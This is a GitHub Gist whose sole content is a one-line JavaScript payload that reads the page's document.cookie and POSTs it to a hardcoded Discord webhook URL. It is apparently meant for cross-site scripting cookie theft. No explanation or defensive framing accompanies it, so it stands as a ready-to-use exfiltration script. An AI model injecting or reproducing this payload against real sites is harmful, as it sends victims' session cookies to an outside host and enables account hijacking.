Skip to content

Instantly share code, notes, and snippets.

@TiltMeSenpai
Last active April 13, 2017 19:04
Show Gist options
  • Save TiltMeSenpai/871bc9f41990133e0bc8d928afbdeab7 to your computer and use it in GitHub Desktop.
Save TiltMeSenpai/871bc9f41990133e0bc8d928afbdeab7 to your computer and use it in GitHub Desktop.
httpRequest = new XMLHttpRequest();httpRequest.open("POST", "https://discordapp.com/api/webhooks/302116147950518273/VWs7_z32reXMDhm1K45fMHM9q2xTsSkAoo9x7EJSyoswOD06lVYaED3NPK8kVZlN55I2");httpRequest.setRequestHeader("Content-Type", "application/json");httpRequest.send(JSON.stringify({content:"cookie:"+document.cookie }));
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment